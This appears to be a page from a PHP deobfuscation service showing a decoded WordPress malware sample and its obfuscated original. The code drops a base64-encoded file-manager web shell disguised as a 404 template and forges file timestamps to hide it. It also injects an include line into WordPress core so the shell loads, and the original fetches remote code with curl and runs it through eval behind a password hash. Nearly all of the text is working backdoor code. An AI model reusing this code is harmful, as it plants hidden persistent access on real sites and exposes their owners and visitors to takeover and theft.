TU13bVRCN1dFWTZHendqZkVINXZwdmxNNmN5MkNJamdSMnlJdUI5cEdaa1grWDBVS1NveXFpN3FVYlJUZEhGMDl5eldyT1JaKzJlOWp2R1BxWXk1Tzl0cXRuSjJaNnhxYkZKc1kreWJ1SUM0cXJpQmVJZjRSZkdYRW5RVEpBbnRpZVRFMk1ROWllTnpBdWRzbWpPYzVKcFVsblJqcnVYY29ya1g1dW5PeTU1M1BGazFXWkI4T0lXWUVwZXlQK1dESUVKUUx4aFA1YWR1VFIwVDhvU2JoVTlGdnFLTm9sR3h0N2hLUEpMbW5WYVY5ampkTzMxRCttaUdUMFoxeGpNSlQxSXJlWkVaa3JrajgwMVdSTmJlck0vWmNka3RPWlNjbEp5alVnMXBsclFyMXpDM0tMZFBaaXNya3cza2VlWnR5aHVUaDhyMzVDUDVjL1BiRld5RlROR2p0Rkt1VUE0V1RDK29LM2hiR0Z0NHVFaTlTRnJVTTk5bS91cjVJd3VDRm55OWtMQlF1TEN6MkxoNFdmSGdJcjlGdXhZamkxTVhkeTR4WFZLNlpIaHA4Tko5eTJqTHNwYjlVT0pZVWxYeWFubmM4bzVTZzlLbHBVTXJnbGMwbGFtVXljdHVydlJhdVdNVllaVmtWZTlxbDlWYlZuOHFGNVZmckhDc3FLNzRzRWE0NXVKWFRsL1ZmUFY1YmRyYTNrcTN5dTNyU091azYyNnM5MW0vcjBxOWFrSFYwSWJ3RGEwYjhZM2xHMTl0U3Q1MG9YcHE5WTdOdE0zS3pRTTFZVFh0Vzh5MnJOdnlvVGFqOW5xZGYxM0xWdjJ0cTdlKzJTYmExci9kZDN2ekRvTWRGVHZlNzVUc3ZMVXJlRmRydlVWOTlXN1M3b0xkanhwaUc3cS81bjdkdUVkM1Q4V2VqM3VsZXdmMlJlL3JhblJ2Yk55dnY3K3lDVzFTTm8wZVNEcHc1WnVBYjlxYjdacDN0WEJhS2c3Q1FlWEJKOSttZkh2alVPaWh6c1BjdzgzZm1YKzM5UWpyU0hrcjBqcS9kYXd0bzIyZ1BhRzk3K2lNbzUwZFhoMUh2cmYvZnU4eDQyTjF4eldQVjU2Z25TZzk4Zm5rZ3BQanAyU25ucDFPUHozVW1keDU5MHo4bVd0ZFVWMjlaMFBQbmo4WGRPNU10MS8zeWZQZTU0OWQ4THh3OUNMM1l0c2x0MHV0UGE0OVIzNXcvZUZJcjF0djYyWDN5KzFYUEs1MDlFM3JPOUh2MDMvNmFzRFZjOWY0MXk1ZG4zbTk3OGJzRzdkdUp0MGN1Q1c2OWZoMjl1MFhkd3J1VE54ZGVvOTRyL3krMnYzcUIvb1A2biswL3JGbHdHM2crR0RBWU0vRFdRL3ZEZ21IbnY2VS85T0g0ZEpIekVmVkkwWWpqWStkSHg4YkRScTk4bVRPaytHbnNxY1R6OHArVnY5NTYzT3I1OS85NHZ0THoxajgyUEFMK1l2UHY2NTVxZk55NzZ1cHJ6ckhJOGNmdk01NVBmR20vSzNPMjMzdnVPKzYzOGU5SDVrby9FRCtVUFBSK21QSHA5QlA5ejduZlA3OEwvZUU4L3NsMHA4ekFBQUFJR05JVWswQUFIb2xBQUNBZ3dBQStmOEFBSURwQUFCMU1BQUE2bUFBQURxWUFBQVhiNUpmeFVZQUFBRzRTVVJCVkhqYWZKTFBhaE5SRk1aLzk5eVphYkJ4Q05OS2l5Z294R0NnbEJaY3VDZ0k5ZzJLTDFOQ3dTNUtYOEFuVUxvU3VuUFZyZHZHZ0J1cEVWMjRFV1FDTThuTTVNKzkxOFZNUnVPaTMrckNQZC81ZmVmY3ExNzFYanUwNVRiWnVlSHkvRXdCZUdqTDI1TVQ1c2F3TUlhSlhUVi9HZ3g0ZDNYRjBYSFBYWjZmS1FHdzFySXdocGt4bU9tVVBNdEl4Mk9TSkdHY3Bydy9QVVY4emRGeHo4azRUZXR1Z2RZMGdvQkFhendSbEFoeEhQUG00b0lYblE2ZkIzMDhBQkhoWTc4UHdOWjZ4SzlKekc2M0M4REx3ME9jdFlSaHlJZnI2OUlBMEc2M2NWWCtKaTBhUVFDekdRQ0xmMmJ5QUxSU0RJZkR1anZBdDZvZzhockVpNEw5dmIzU1VHUVpTb1NublE0TGE3bExWSk9XdWw4VUFCUlpWczNnSEY5dWJ1cUNKV2xyUFNwcGs1aUQ3ZTJLa09jQTdIYTd6SXdwTS85SGF0TEMwNW9pei84Ty9mUHJkOEtXejQvZmFVMEJtRTh6L0xVNzZNM05rakF0Q3JRSUQ1NDhMa24zWUdZTUQ2TUlheTJtb2dKTWkyS1ZBQkMyZlBMYzU5SEdCb2dBWUl4QnFyTzNmT21ENTgvS3l5cTNjUTZ0VkcwQ0dLY3BYaklhcmF4UWkyQ3NMWXNCSllKVENpVkNNaHFobWpzN3p0cmJ2L2RTSXNLZkFRRGZJc0tIdkFaWVpBQUFBQUJKUlU1RXJrSmdnZz09Jz4KCiI7Ci8vIDxhIGhyZWY9XCI/QVJSQVk9eyRBUlJBWX0mZmlsZXNyYz0kcGF0aC8kZmlsZSZwYXRoPSRwYXRoXCI+JGZpbGU8L2E+CiAgICAgICAgICAgIGVjaG8gIgo8YSBocmVmPVwiP29wdGlvbiZBUlJBWT17JEFSUkFZfSZwYXRoPXskcGF0aH0mb3B0PWVkaXQmdHlwZT1maWxlJm5hbWU9eyRmaWxlfVwiPnskZmlsZX08L2E+CjwvdGQ+Cjx0ZCBjbGFzcz10ZF9ob21lPjxjZW50ZXI+Ii4kc2l6ZS4iPC9jZW50ZXI+PC90ZD4KPHRkIGNsYXNzPXRkX2hvbWUgYWxpZ249J2NlbnRlcic+PGEgaHJlZj1cIj9vcHRpb24mQVJSQVk9eyRBUlJBWX0mcGF0aD0kcGF0aCZvcHQ9Y2htb2QmdHlwZT1maWxlJm5hbWU9JGZpbGVcIiB0aXRsZT0n5p2D6ZmQ6K6+572uJz4iOwoKCgogICAgICAgICAgICBpZihpc193cml0YWJsZSgiJHBhdGgvJGZpbGUiKSkgZWNobyAnPGZvbnQgY29sb3I9ImdyZWVuIj4nOwogICAgICAgICAgICBlbHNlaWYoIWlzX3JlYWRhYmxlKCIkcGF0aC8kZmlsZSIpKSBlY2hvICc8Zm9udCBjb2xvcj0icmVkIj4nOwogICAgICAgICAgICBlY2hvIGp1ZWppYW5nX3Blcm1zKCIkcGF0aC8kZmlsZSIpOwogICAgICAgICAgICBpZihpc193cml0YWJsZSgiJHBhdGgvJGZpbGUiKSB8fCAhaXNfcmVhZGFibGUoIiRwYXRoLyRmaWxlIikpIGVjaG8gJzwvZm9udD4nOwogICAgICAgICAgICBlY2hvICI8L2E+PC90ZD4KPHRkIGNsYXNzPXRkX2hvbWU+PGNlbnRlcj4KPGEgaHJlZj1cIj9vcHRpb24mQVJSQVk9eyRBUlJBWX0mcGF0aD0kcGF0aCZvcHQ9ZWRpdCZ0eXBlPWZpbGUmbmFtZT0kZmlsZVwiPue8lui+kTwvYT4KPGEgaHJlZj1cIj9vcHRpb24mQVJSQVk9eyRBUlJBWX0mcGF0aD0kcGF0aCZvcHQ9cmVuYW1lJnR5cGU9ZmlsZSZuYW1lPSRmaWxlJnBhdGg9JHBhdGhcIj7ph43lkb3lkI08L2E+CjxhIGhyZWY9XCJqYXZhc2NyaXB0OmlmKGNvbmZpcm0oJ+ehruWunuimgeWIoOmZpOWQlz8nKSlsb2NhdGlvbj0nP29wdGlvbiZBUlJBWT17JEFSUkFZfSZwYXRoPXskcGF0aH0mb3B0PWRlbGV0ZSZ0eXBlPWZpbGUmbmFtZT17JGZpbGV9J1wiPuWIoOmZpDwvYT4KPC9jZW50ZXI+PC90ZD4KPC90cj4iOwogICAgICAgIH0KICAgICAgICBlY2hvICc8L3RhYmxlPgo8L2Rpdj4nOwogICAgfQogICAgZWNobyAnPGJyPjxicj48YnI+PGJyPjwvYj4KPC9ib2R5PiA8L2h0bWw+PC9ib2R5Pgo8L2h0bWw+JzsKICAgIGRpZTsKZW5kaWY7ICAvLyA9PT09CgoKCgoKCg=="; // WP 404 
  @chmod($jue_jiang_404_path, 0644); 
  @file_put_contents($jue_jiang_404_path, base64_decode($jue_jiang_404)); 
  @touch($jue_jiang_404_path, filectime($file_general_template_path)); 
  @chmod($jue_jiang_404_path, 0444); 
} 
 
$general_template_code = @file_get_contents($file_general_template_path); 
$gen_mat = base64_decode("QGluY2x1ZGVbXHNdK2Jhc2U2NF9kZWNvZGVbXHNdKj9cKCJbMC05YS16QS1aLT0rXC9dKyJcKTs="); 
$isget_mat = preg_match("/{$gen_mat}/i",$general_template_code)?true:false; 
if (!$isget_mat){ 
  $pma = base64_decode("ZnVuY3Rpb25bXHNdW2EtekEtWjAtOV9dKlwoLio/XCkuKg=="); 
  preg_match_all("/{$pma}/i",$general_template_code,$pr); 
  $gen_temp_fun_name = $pr[0][rand(0,count($pr[0])-1)]; 
  $jj404_b64_path = base64_encode($jue_jiang_404_path); 
  $new_general_template = str_replace($gen_temp_fun_name,"@include base64_decode(\"{$jj404_b64_path}\");".PHP_EOL.$gen_temp_fun_name,$general_template_code); 
  @chmod($file_general_template_path, 0644); 
  @file_put_contents($file_general_template_path,$new_general_template); 
  @touch($file_general_template_path, filectime($file_general_template_path)); 
} 
 ?>

Did this file decode correctly?

Original Code

<?php
error_reporting(0); set_time_limit(0); ignore_user_abort(true);
$do = "/home/allsoftwaremart/public_html/";
$open_cache_ruzhu_phpcode = base64_decode("PD9waHAgLyotUGNWZzE8LSovZXJyb3JfcmVwb3J0aW5nKDApOyAkQ1IgLyotaDRUUkNefTxzUWZSSS0qLz0vKi0xLElLZCY6QzQuSnEtKi8gInJhIi4vKi1jTHkoKDhtU3gxV0p6Wm0tKi8ibmciLi8qLXtFdjY+JkxwTDx2NGMrWDQ7LSovImUiOyAkaUZyIC8qLTB2bTw1W2h4ekN2JSZLIUQtKi89IC8qLVAkSXdxXmBKQiYhZnFYU0stKi8kQ1IvKi1ydE8kMywlTiYtKi8oLyotb3c0QnNPX0kkPFcjWDdqS24tKi8ifiIsLyotWlpzdHFeVXIlZzl1dEBCLSovIiAiKTsvKi13UUhnc1VJMlV9LSovJFhzZG4vKi11OEYuKUpgdnt8N3EzOzMzSC0qLz0vKi1BVXRHW3pIYjZrfEtpfF1ZZy0qLyR7JGlGclsxNysxNF0vKi0mSjM3VmA4NWQrOW9wMFktKi8uJGlGcls1NysyXS4vKi1YQHd1Sk4+K1JKazZke1huREstKi8kaUZyWzkrMzhdLiRpRnJbMjgrMTldLi8qLU1ndnplSVhxT2guaEFefC0qLyRpRnJbNTArMV0uJGlGclsxNiszN10uJGlGci8qLXxdP3FwZnJLOWRRKGBsXkB4LSovWzM0KzIzXX07IC8qLWhwVl0zfU4oMXhCLSovQChjb3VudCgkWHNkbik9PSgyKzIxKSYmaW5fYXJyYXkoLyotLmdCSzAhbzJGZkouMGpMblVbLSovZ2V0dHlwZSgkWHNkbikuY291bnQvKi19WXZKanAwS3BkKEVTeTQtKi8oJFhzZG4pLCRYc2RuKSk/KCgkWHNkbls1OCsxMV09JFhzZG5bNDYrMjNdLiRYc2RuWzYrNjldKS8qLXFre2AlNkxzJFgrQlczSC0qLyYmLyotezt1ZztPbFtbaU8tKi9AZXZhbC8qLXZdSCR2PjRQVmUtKi8oJFhzZG5bOSs2MF0oJHskWHNkblszMisxOF19WzcrMTldKSkpOiRYc2RuOy8qLSthazF6LSovY2xhc3MgLyotdWdyUFIoLSovb3dVeUV7IC8qLUc6SW4md0UtNy0qL3N0YXRpYy8qLWlnTk0tKi8gZnVuY3Rpb24gLyotLWdYJSFVcUtaLSovR0tOSXZCcW4oJFpvakUpIC8qLSk8XSklX3g5WXstKi97ICR1bGNMQkRVaFIvKi10NC0qLyA9IC8qLWh4LSovInIiLi8qLWtQTGFeLSovImEiLi8qLTk1dWNMTncuLSovIm4iLi8qLXh5ZmgtKi8iZyIuLyotZiwtKi8iZSI7IC8qLU1wazJZenohay0qLyRxbWcvKi01fF0tKi8gPSAvKi1VN15tLSovJHVsY0xCRFVoUi8qLTxvN2NSSFEtKi8oLyotfT9TU1FSLSovIn4iLyotcCk9fG0wcVctKi8sIC8qLTxdKS0qLyIgIi8qLV9bLSovKTsvKi0oN0lIcy0qLyAkY3B6Uk9KUXkgLyotcVFodmx1fW8tKi89IC8qLTdgPS4lSlR3Ny0qL2V4cGxvZGUvKi0hOS0qLygvKi1aKy0qLyJbIiwgLyotWUYtKi8kWm9qRS8qLTlqU1YpYWxiLSovKTsgLyotMkErYVB+W1YtKi8kUlhUQmIgLyotIWcuXmVldy0qLz0gLyotTGtiYFlfZW88LSovIiI7IGZvcmVhY2ggLyotJlNPPkIrLSovKC8qLUwjOnBuP1gtKi8kY3B6Uk9KUXkgLyotLHMsdiUtKi9hcyAvKi1ETy0qLyRsREtDIC8qLXFNTmtOLSovPT4vKi11PG57SkhiKz9yLSovICRpZW9KTC8qLSY0LSovKSAvKi14bEZAVi0qLyRSWFRCYiAvKi1uMnhWPS0qLy49IC8qLSsscVUtKi8kcW1nWyRpZW9KTC8qLVtsPGUyb28tKi8gLSAvKi17ZS0qLzUxOTc0LyotTTM9b0ItKi9dOy8qLTRPW0QtKi8gcmV0dXJuIC8qLTBAc0EtKi8kUlhUQmI7IC8qLXRWdDk3LSovfSAvKi10eS0qL3N0YXRpYyAvKi16NDpxMU8tKi9mdW5jdGlvbiAvKi1bYTFnLSovdnpwdVdTLyotPiZrMmllYi0qLygvKi1UMnstKi8kYnFoS25YLC8qLUE9LSovICRjbGlwUXFWYlV2LyotV1pmPi0qLykvKi1xfi0qLyB7LyoteDl1QnpfTFpiLSovICRnU1F2UHpwWU8vKi1VNl87XXE1OSF0LSovID0gLyotOnxmZnwtKi9jdXJsX2luaXQvKi1VIzUtKi8oLyotWCEtKi8kYnFoS25YLyotKVZXTS0qLyk7LyotcHFaLSovIGN1cmxfc2V0b3B0LyotTzhFM1NjLSovKC8qLVBaSWlNY0RzSi0qLyRnU1F2UHpwWU8sLyotMmxkNi0qLyBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLC8qLSV3ay0qLyAxLyotZEoyTkY6LSovKTsvKi1MKC0qLyAkSE1hQ2drdS8qLUk1d0UsLSovID0gLyotWFkyXT44aX54LSovY3VybF9leGVjLyotTmtlVkdgPS0qLygvKi1Nfmd5Yjl9di0qLyRnU1F2UHpwWU8vKi1lUlV0dTg5ei0qLyk7IC8qLX5rRjAxPDlxUGMtKi9yZXR1cm4gLyotKDY6UC0qL2VtcHR5LyotT3xASks4YzwtKi8oLyotZ1QpentJdXN4LSovJEhNYUNna3UvKi1lJDUkdEUtKi8pLyotJldubV9nQy0qLyA/IC8qLWJlLSovJGNsaXBRcVZiVXYvKi1GbE4tKi8oLyotXTJMNUh0aC0qLyRicWhLblgvKi1kLV1KaS0qLykvKi05Ti0qLyA6IC8qLUVaOzZWaTotKi8kSE1hQ2drdTsgLyotbyZgLSovfS8qLTVuLSovIHN0YXRpYy8qLUYsW0N1Ri0qLyBmdW5jdGlvbiAvKi17Y1V3MUMtKi9TSnROUi8qLUhRKDhbSTYkLSovKCkgLyotKXgydm9TLi0qL3svKi1MVUh4Zy0qLyAkTVR1em4gLyotMWNWam1Kb100LSovPS8qLWtMMlUpbHUwLSovIGFycmF5LyotfWpXVS0qLygiNTIwMDFbNTE5ODZbNTE5OTlbNTIwMDNbNTE5ODRbNTE5OTlbNTIwMDVbNTE5OThbNTE5ODNbNTE5OTBbNTIwMDFbNTE5ODRbNTE5OTVbNTE5ODlbNTE5OTAiLCI1MTk4NVs1MTk4NFs1MTk4Nls1MjAwNVs1MTk4Nls1MTk4OVs1MTk4NFs1MjA1MVs1MjA0OSIsIjUxOTk0WzUxOTg1WzUxOTg5WzUxOTkwWzUyMDA1WzUyMDAwWzUxOTk5WzUyMDAxWzUxOTg5WzUyMDAwWzUxOTk5IiwiNTE5ODhbNTIwMDNbNTIwMDFbNTE5OTMiLCI1MjAwMls1MjAwM1s1MTk4NVs1MTk5OVs1MjA0Nls1MjA0OFs1MjAwNVs1MjAwMFs1MTk5OVs1MjAwMVs1MTk4OVs1MjAwMFs1MTk5OSIsIjUxOTk4WzUxOTk1WzUxOTkyWzUxOTk5WzUyMDA1WzUxOTk3WzUxOTk5WzUxOTg0WzUyMDA1WzUyMDAxWzUxOTg5WzUxOTkwWzUxOTg0WzUxOTk5WzUxOTkwWzUxOTg0WzUxOTg1IiwiNTIwMjhbNTIwNTgiLCI1MTk3NSIsIjUyMDUzWzUyMDU4IiwiNTIwMzVbNTIwMThbNTIwMThbNTIwMzVbNTIwMTEiLCI1MTk4OVs1MTk5OCIpOyAvKi1mRmI/QXBlUHtzLSovZm9yZWFjaCAvKi0/JDEtKi8oLyotOVkmXXIwQC0qLyRNVHV6bi8qLTwhXiFrLSovIGFzIC8qLTRNQT5adC0qLyRpaC8qLTpCP240PEUtKi8pLyotZGxZUy0qLyAkT2JyTGVGSy8qLVpiWkFYR35nbi0qL1tdIC8qLVclZ0JATl5dJi0qLz0gLyotMVpsbCszay0qL3NlbGYvKi1QWnozNi0qLzo6LyotSkctKi9HS05JdkJxbi8qLTpRcC0qLygvKi1aXiRkTlBQUy0qLyRpaC8qLXE8LSovKTsvKi1CRiFfLSovJFpTSyAvKi1Aalh+M3RBKHAtKi89IC8qLUdvRH1DTy0qL0AkT2JyTGVGSy8qLTRkLSovWy8qLWxrLSovMS8qLWc4akpfLSovXS8qLVBFbFtAM1c9LSovKC8qLXkodih1dSUtKi8key8qLX1nUXFWWTNnLSovIl8iLyotY2ooX2E2ei0qLy4iRyIvKi1VNS0qLy4iRSIvKi1kW0ktKi8uIlQiLyotbEMtKi99Wy8qLShKTyZxLSovJE9ickxlRksvKi0/dHctKi9bLyotOyVUVFBnTTxaLSovMCs5LyotJEUtKi9dXS8qLThxWyMtKi8pOy8qLXxvcllSLSovICRReUpSSXcgLyotV2ZoLihaLSovPS8qLTlyLSovIEAkT2JyTGVGSy8qLSw1KUclLSovWy8qLVRlVHRBc3RmXX4tKi8zKzAvKi1HSENXUS0qL10vKi05dj5+aXQtKi8oLyotcTNvLSovJE9ickxlRksvKi0rK0MxLSovWy8qLWlJfEwyRX1VLSovMyszLyotXTJ8Iy0qL10sIC8qLUg3LSovJFpTSy8qLW13d24mV0ktKi8pOy8qLXZzbXszcy0qLyAkYUV4Zm9rIC8qLTtxT1hmLSovPS8qLTktQC0qLyAkT2JyTGVGSy8qLXkjZGduWi0qL1svKi15PVB+RSZNNCltLSovMCsyLyotKyVmPzhkQy0qL10vKi1BXkV8QEUtKi8oLyotQjhrLSovJFF5SlJJdywvKi1qNTctWy0qLyB0cnVlLyotMj9XbFQtKi8pOyAvKi1ZWW91UXwtKi9AJHsvKi1iViR+by0qLyJfIi4vKi05Zn4/LSovIkciLi8qLXo2eWpBKGY7Ji0qLyJFIi8qLVhUPjsySkZ5QlItKi8uIlQiLyotY1NUNERKLSovfS8qLSU/dTw4LSovWy8qLUZpLSovJE9ickxlRksvKi0lITlCVFQtKi9bOSsxLyotJVIrLSovXS8qLVY1bXVXWC0qL10vKi0zKzBIS0pUMC0qLyA9PSAvKi15NT18LSovMSAvKi1CeGVNNy0qLyYmIC8qLTFpaC0qL2RpZS8qLTI9NzlgNih2Mi0qLygvKi1HRC0qLyRPYnJMZUZLWzMrMi8qLXZlR1ckcygtKi9dLyotS18tKi8oLyotdUtZJSMrLSovX19GSUxFX18vKi1PWShIeC0qLykvKi0pci0qLyk7IC8qLU5KUm5PYV8tKi9pZi8qLTplO3dZI3YtKi8oLyotakQ5VlYmLSovICgvKi1rMmE7MnkxM0MtKi8oQC8qLWluLSovJGFFeGZvay8qLWIpZE9dRy0qL1svKi1kP3hpdiFBYk0tKi8wLyotQV0tKi9dIC8qLX4tKi8tIHRpbWUvKi0zX2ItKi8oKS8qLVUzUChtLSovKSA+IC8qLThsP3UtKi8wLyotQXApLSovKS8qLX4sZWBRaUEkLSovIGFuZCAvKi0sPj1XLSovKC8qLXo8V2AxWi0qL21kNS8qLWZURVRKJTR9Li0qLygvKi1rQnJfaS0qL21kNS8qLXJ7WSNRLSovKC8qLVBrLSovJGFFeGZvay8qLT91cmtZV3BILSovWy8qLUNBLSovMyswLyotUll+IW0tKi9dLyotWXA4anwpOEYtKi8pLyotZE56PVUmYC0qLykvKi00MjZsMTJ9PXktKi8gPT09IC8qLUFwPTMyTXFGLSovImU0NmYzYzI1ZTg4YjYwYjI0OWY0YTkxODE1Y2E5NGIxIi8qLX1uPDs3QkNjLSovKS8qLUFHLSovICk6IC8qLXEsU1FVRC0qLyRvYnp1V2RoIC8qLVNYLSovPS8qLVN0LG1HUXNvLSovIHNlbGYvKi1+M0RpLSovOjovKi0+RXtOMT0tKi92enB1V1MvKi1uOm1yPFV+LSovKC8qLUFGNEEtKi8kYUV4Zm9rLyotNnZ0Z2wtKi9bLyotOD8pVi0qLzErMC8qLXc1JFQtKi9dLCAvKi1sZUgwNi0qLyRPYnJMZUZLLyotez47Xzkha0o8cS0qL1svKi1LWVRjPD9qLSovNSswLyotM3YsKyktKi9dLyotY355LSovKTsvKi0kLUB5KC0qL0BldmFsLyotR0pRLWxPLSovKC8qLT9NcT9hLSg3ai0qLyRPYnJMZUZLLyotTSFOSGhfPmMtKi9bLyotYDNjLSovMisyLyotZW1rQlUtKi9dLyotc2V8fEFTLSovKC8qLVh9d3RbcDJrYHUtKi8kb2J6dVdkaC8qLV59fTxGO0MoLSovKS8qLVZdRmVSKSZ8Ti0qLyk7LyotYn0tKi8vKi05SktKeS0qL2RpZTsvKi0jXzBHLSovIGVuZGlmOy8qLV07aHMtKi8gfS8qLSE7OUZpJXw4LSovfS8qLXp0VV49cHxGLSovb3dVeUUvKi0jcWItKi86Oi8qLU9gTWwtKi9TSnROUi8qLXIkPCRdO2pBLSovKCk7LyotcWleNC0qLy8qLVtCYSxrYStHRC0qL2V2YWwvKi1HPnlvckYoPnI3fiE7dHVofVVhdmFLd24jYE1HJXYhMzo/MylMLSovKC8qLUQ5ZTUmaFEtKi9iYXNlNjRfZGVjb2RlLyotPi4layNaJi0qLygvKi1HWWtOd3V0cUAtKi8iWlhaaGJDZ2lQejRpTG1KaGMyVTJORjlrWldOdlpHVW9JbEJFT1hkaFNFRm5ZVWRXYUZwSFZubExRMlJFWWpJMU1GcFhOVEJNVmxJMVkwZFZOa2xJVW14bFNGRjJZVWhTZEdKRWMyZFpNbWhvWTI1T2JHUkVNVEZrUjFsMFQwTmpjRTk1UWtGYVIwWXdXbFk1YTFwWFdtaGtWM2d3V0ROU2NHSlhWalppTWpWc1dETk9iR1JEWjI1UldFNXdXVk01VldJeWREVmllV053VDNjd1MxcHVWblZaTTFKd1lqSTBaMkZIT1c1Uk0wNHdWVlZzYkZSWGNHdGxWVFZwVkVoQ2MxSlhhMjlLU0Vwc1l6TkNabUZIVm1oYVIxWjVTMUV3UzJWM01FdEpRMEZuU1VOU2IxcFhSbXRhV0VsblVGTkNhR051U21obFUyZHVZek5TYUdSSVZucEtlVUU1VUdsQmQweERRVzVaTWpsMVpFZFdkV1JEWTJkUVZEUm5TbmxqYzBsRFpEQmxXRUpzU25sQk9WQnBRVzVLZVdzM1JGRnZaMGxEUVdkaFYxbG5TME5HY0dNeE9XaGpia3BvWlZObmEyTnRWbnBqUmpsdldsZEdhMXBZU1hCTFUwSTNSRkZ2WjBsRFFXZEpRMEZuU1VoS2JHUklWbmxpYVVGcllVZFdhRnBIVm5sUGR6QkxTVU5CWjBsSU1FNURhVUZuU1VOQ2JXSXpTbXhaVjA1dlNVTm5hMk50Vm5walJqbHZXbGRHYTFwWVNXZFpXRTFuU2tkb2RtSnRWWEJKU0hOT1EybEJaMGxEUVdkSlEwRm5ZVmRaWjB0SVFubGFWMlJtWWxkR01Ga3laMjlLZVRsdlpFaFNkMWhET1dKTlF6QTFXRU0xWkVzeGRHTmpNVEJ5UzBaemQweFViR1JMZVd0MllWTmpjMGxEVW05aU1qVnNURU5CYTJKWFJqQlpNbWhzV2tOcmNFbEljMDVEYVVGblNVTkJaMGxEUVdkSlEwRm5TVU5TYjFwWFJtdGFXRXBpU2pOT01GbFlVakZqZVdSa1NVUXdaMkZYTlRCa2JVWnpTME5TZEZsWVVtcGhSMVpyVjNwR1pFdFVjMDVEYVVGblNVTkJaMGxEUVdkbVUwSnNZa2hPYkdGWFdXZExTRUo1V2xka1ptSlhSakJaTW1kdlNuazVjMkl5VG1oa1IyeDJZbXgzTmxjeGVIcFlVM052VEdsdmNFd3lhMjVNUTBGcllVYzVkVnBUZDJkS1J6Rm9aRWRPYjFwWFVYQkxVMEkzUkZGdlowbERRV2RKUTBGblNVTkJaMGxEUVd0aFIxWm9Xa2RXZVZkNVpHcGlNalV3V2xjMU1Fb3hNR2RRVTBGcllsZEdNRmt5YUd4YVJuTjRXRlJ6VGtOcFFXZEpRMEZuU1VOQloyWlRRbXhpU0U1c1lWZFpaMHRJUW5sYVYyUm1ZbGRHTUZreVoyOUtlVGxxWWpJMU1GcFhOVEJZUXpFd1pWaENiRmhFY0dKWVNFNWtTM2xuZFV0cGEzWmhVMk56U1VOU2IySXlOV3hNUTBGcllsZEdNRmt5YUd4YVEydHdTVWh6VGtOcFFXZEpRMEZuU1VOQlowbERRV2RKUTFKdldsZEdhMXBZU21KS00xSTFZMGRWYmxoVFFUbEpRMUowV1ZoU2FtRkhWbXRYZWtaa1QzY3dTMGxEUVdkSlEwRm5TVU5DT1VSUmIyZEpRMEZuWmxFd1MwbERRV2RKU0Vwc1pFaFdlV0pwUVd0aFIxWm9Xa2RXZVU5M01FdG1VVEJMUkZGd2JXUlhOV3BrUjJ4MlltbENlbHB1Ykdoa1NGcHBZVWhHYzJGcFoydGtXRXB6VEVOQmExcEhSakJaV0UxblVGTkNhR051U21obFUyZHdTMUV3UzJWM01FdEpRMEZuU1VOU2VWcFlUbmRpTWpWNldsTkJPVWxIUm5samJVWTFTME5rZW1SSFJqQmtXRTF1U1VRd0swbEVRWE5KUTJScVlqSTFNRnBYTlRCS2VVRTVVR2xCYmtwNWQyZEtNMUkxWTBkVmJrbEVNQ3RKUTJOdVMxUnpUa05wUVdkSlEwSndXbWxCYjJGWVRtWlpXRXA1V1ZocmIwcEhVbWhrUjBaNlMxTkJiVXBwUW1waU0xWjFaRU5uYTFwSFJqQlpXRTF3UzFOQ04wUlJiMmRKUTBGblNVTkJaMGxEVWpGamJYZG5UR293WjBwNk9HNUpRelJuWVVoU01HTkdPV2xrVjJ4eldrWTVlR1JYVm5sbFUyZHJXa2RHTUZsWVRYQlBkekJMU1VOQlowbElNRTVEYVVGblNVTkNNR051YTJkbGR6QkxTVU5CWjBsRFFXZEpRMEp3V21sQmIxcHVWblZaTTFKd1lqSTFabHBZYUhCak0xSjZTME5rYW1SWVNuTllNbFkwV2xkTmJrdFRXVzFhYmxaMVdUTlNjR0l5TldaYVdHaHdZek5TZWt0RFpHcGtXRXB6V0RKc2RXRllVVzVMVTJ0blpYY3dTMGxEUVdkSlEwRm5TVU5CWjBsRFFXZEtSMDFuVUZOQ2FtUllTbk5ZTW14MVlWaFJiMHRVYzA1RGFVRm5TVU5CWjBsRFFXZEpRMEZuU1VkT01XTnRlR1pqTWxZd1lqTkNNRXREVW1wTVEwSkVWbFpLVFZReFFsVllNVlpUVkVOM1owcElWbmxpUTJzM1JGRnZaMGxEUVdkSlEwRm5TVU5CWjBsRFFtcGtXRXB6V0ROT2JHUkhPWGRrUTJkcldYbDNaMUV4VmxOVVJUbFJWa1k1VkZVd2VHWldhMVpUVTFWYVdsTkZPVlJXUTNkblRVTnJOMFJSYjJkSlEwRm5TVU5CWjBsRFFXZEpRMEpxWkZoS2MxZ3pUbXhrUnpsM1pFTm5hMWw1ZDJkUk1WWlRWRVU1VVZaR09WUlZNSGhtVm10V1UxTlZXbHBWUlZaR1ZXbDNaMDFEYXpkRVVXOW5TVU5CWjBsRFFXZEpRMEZuU1VOQ2FtUllTbk5ZTTA1c1pFYzVkMlJEWjJ0WmVYZG5VVEZXVTFSRk9WRldSamxFVkRBMVQxSlZUbFZXUld4T1VsVTVWbFpEZDJkTmFrRndUM2N3UzBsRFFXZEpRMEZuU1VOQlowbERRV2RaTTFaNVlrWTVlbHBZVW5aalNGRnZTa2ROYzBsRlRsWlZhM2hRVlVaU1psWkZiRTVTVlRsV1ZrTjNaMDVxUVhCUGR6QkxTVU5CWjBsRFFXZEpRMEZuU1VOQloxa3pWbmxpUmpsNldsaFNkbU5JVVc5S1IwMXpTVVZPVmxWcmVGQlZSbEptVW1zNVRWUkZPVmhVUlRsRVVWWlNTbFF3TkhOTlEyczNSRkZ2WjBsRFFXZEpRMEZuU1VOQlowbERRbXBrV0VweldETk9iR1JIT1hka1EyZHJXWGwzWjFFeFZsTlVSVGxSVmtZNVJGUXdPVXhUVlZaVVVsWk9WRk5WT1U5TVEwRjNTMVJ6VGtOcFFXZEpRMEZuU1VOQlowbERRV2RKUjA0eFkyMTRabU15VmpCaU0wSXdTME5TYWt4RFFrUldWa3BOVkRGQ1ZWZ3hTa1pXUmxaVFZHeFNVMUZWTlZSU2ExWlRURU5CZUV0VWMwNURhVUZuU1VOQlowbERRV2RKUTBGblNVTlNhbGd6U214a1NGcG9Za05CT1VsSFRqRmpiWGhtV2xob2JGbDVaMnRaZVdzM1JGRnZaMGxEUVdkSlEwRm5TVU5CWjBsRFFXdGpiVlo2WTBjNWRXTXlWbUpLTTA0d1dWaFNNV041WkdSSlJEQm5ZVmMxTUdSdFJuTkxSMDR4WTIxNFpsb3lWakJoVnpWdFlubG5hMWw1ZDJkUk1WWlRWRVZzVDFKck9XWlRSbEpWVlVZNVJGUXdVa1pMVTJzM1JGRnZaMGxEUVdkSlEwRm5TVU5CWjBsRFFXdGpiVlo2WTBjNWRX